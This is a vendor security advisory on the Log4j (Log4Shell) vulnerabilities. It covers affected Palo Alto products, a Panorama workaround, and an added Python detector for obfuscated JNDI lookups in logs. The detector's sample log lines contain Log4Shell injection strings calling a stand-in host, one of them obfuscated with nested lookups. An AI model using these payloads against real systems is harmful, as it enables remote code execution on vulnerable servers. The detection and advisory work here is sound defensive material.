Palo Alto Networks Product Security Incident Response Team
PA-CVE-2021-44228
Dec 10, 2021 - 9:45 p.m.

Impact of Log4j Vulnerabilities CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, and CVE-2021-44832

securityadvisories.paloaltonetworks.com

CVSS3: 10 High
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: NONE
  User Interaction: NONE
  Scope: CHANGED
  Confidentiality Impact: HIGH
  Integrity Impact: HIGH
  Availability Impact: HIGH
  Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVSS2: 9.3 High
  Access Vector: NETWORK
  Access Complexity: MEDIUM
  Authentication: NONE
  Confidentiality Impact: COMPLETE
  Integrity Impact: COMPLETE
  Availability Impact: COMPLETE
  Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

EPSS: 0.976 High (Percentile 100.0%)

The Apache Log4j Java library is vulnerable to the remote code execution vulnerability CVE-2021-44228, known as Log4Shell, and the related vulnerabilities CVE-2021-45046, CVE-2021-45105, and CVE-2021-44832. Log4Shell allows remote unauthenticated attackers with the ability to inject text into log messages to execute arbitrary code loaded from malicious servers with the privileges of the process using Log4j.
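As an added illustration of the "inject text into log messages" vector (example code written for this page, not part of the Palo Alto Networks advisory), the detector below replays the innermost-first lookup resolution Log4j performs for the lower/upper and default-value lookups, so that a JNDI lookup hidden behind nesting is still flagged when a defender scans existing log lines. The sample lines and the attacker.example hostname are constructed for the example.

```python
import re

# Log4j resolves nested lookups innermost-first. Two lookups were widely used to
# hide the literal string "jndi" from naive matching: ${lower:X}/${upper:X} and the
# default-value form ${name:-value}, which yields "value" when "name" is undefined.
NESTED_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
DEFAULT_VALUE_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Collapse the obfuscating lookups above, innermost first, until stable."""
    for _ in range(max_rounds):
        new = NESTED_CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        new = DEFAULT_VALUE_LOOKUP.sub(lambda m: m.group(1), new)
        if new == text:          # nothing left to resolve
            break
        text = new
    return text


def contains_jndi_lookup(line: str) -> bool:
    """True when the line, after normalization, carries a ${jndi:...} lookup."""
    return JNDI_LOOKUP.search(normalize(line)) is not None


def scan(lines):
    """Return (line_number, line) for every line that carries a JNDI lookup."""
    return [(n, line) for n, line in enumerate(lines, 1) if contains_jndi_lookup(line)]


# Constructed sample web-server log lines (not real traffic); line 3 nests lookups.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${lower:J}${::-n}di:rmi://attacker.example/b}"',
    '10.0.0.3 - - "GET / HTTP/1.1" 200 "${date:yyyy}"',
]

if __name__ == "__main__":
    for n, line in scan(SAMPLE_LOG):
        print(f"line {n}: JNDI lookup found -> {normalize(line)}")
```

Lines 2 and 3 are flagged; line 4 uses a benign lookup and is not. A hit in an application's logs is a signal that the input reached a logging call, not proof that a vulnerable Log4j resolved it, so pair this with the version and configuration checks the advisory describes.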

These products and services are not affected by Log4Shell: Bridgecrew, Cortex Data Lake, Cortex XDR agents, Cortex XSOAR, Cortex Xpanse, Enterprise Data Loss Prevention (DLP), Expedition, the GlobalProtect app, IoT Security, Okyo Garde, PAN-DB Private Cloud, PAN-OS software running on firewalls including VM and CN series, Prisma Access, Prisma Cloud, Prisma Cloud Compute, Prisma SD-WAN (CloudGenix), SaaS Security, Traps, User-ID Agent, WildFire Appliance (WF-500), and WildFire Cloud.

We have determined that some configurations of Panorama appliances with PAN-OS 9.0, PAN-OS 9.1, and PAN-OS 10.0 are impacted by CVE-2021-44228 and CVE-2021-45046 through the use of Elasticsearch. Fixes were released on December 20, 2021 to address both vulnerabilities on impacted PAN-OS versions. Panorama appliances are not impacted by CVE-2021-45105 and CVE-2021-44832.

NOTE: PAN-OS 8.1 and PAN-OS 10.1 versions for Panorama are not impacted by these issues. No version of PAN-OS for firewalls or WildFire appliances is affected.

These vulnerabilities impact Exact Data Matching (EDM) CLI application versions 1.0 - 2.0 provided by Enterprise Data Loss Prevention (DLP). Enterprise DLP is not affected by these issues.

The Palo Alto Networks Product Security Assurance team has completed evaluation of all products and services for these vulnerabilities. All cloud services with known possible impact have been remediated.

At this time, our guidance and criteria for impacted Panorama appliances remain the same for all related vulnerabilities. The Exact Data Matching (EDM) CLI application should now be upgraded to EDM CLI version 2.1 or later versions.

Workaround:
Each Panorama hardware appliance and virtual appliance running in Panorama mode or Log Collector mode that is also part of a Collector Group must be removed from its Collector Group in ‘Panorama > Collector Group > Custom-CG-Name > General’ in the web interface. Once the affected appliances are removed from all groups, perform a Panorama commit and a Collector Group push for every affected Collector Group. Do not delete the Collector Groups before performing the Collector Group push for the affected Collector Groups; otherwise the push will fail to remove the appliances.

NOTE: When this workaround is applied, logging and reporting features in Panorama will not work. All logs stored on the appliance will be lost once it is removed from the Collector Group.

Finally, all appliances that were part of the Collector Group need to be restarted to stop the use of Elasticsearch. This eliminates the exposure to CVE-2021-44228 and CVE-2021-45046.

You can restart the appliance by visiting ‘Panorama > Operations > Device Operations > Reboot Panorama’ from the web interface or by using the command ‘request restart system’ from the CLI.
Once these steps are completed, you can verify that Elasticsearch has stopped, and that the appliance’s exposure to CVE-2021-44228 and CVE-2021-45046 has been removed, by running the command ‘show system software status | match elasticsearch’ from the CLI.

Managed PAN-OS firewalls can be configured to forward logs to other servers until Panorama log collection functionality is restored. Alternate Log Forwarding options are detailed here: https://docs.paloaltonetworks.com/pan-os/10-0/pan-os-web-interface-help/objects/objects-log-forwarding.html

Follow the security best practices listed in ‘Protecting Panorama and Log Collector Inbound and Outbound Communications’ to reduce the risk of successful exploitation of CVE-2021-44228 and CVE-2021-45046 on Panorama appliances: https://live.paloaltonetworks.com/t5/general-articles/protecting-panorama-and-log-collector-inbound-and-outbound/ta-p/454071

Additionally, use ACLs to limit network access to Panorama to only trusted users and trusted networks and IP addresses. Use App-ID for ‘ldap’ and ‘rmi-iiop’ to block all LDAP and RMI traffic to and from untrusted networks or unexpected sources.

No other workarounds or mitigations are available for Palo Alto Networks products at this time.
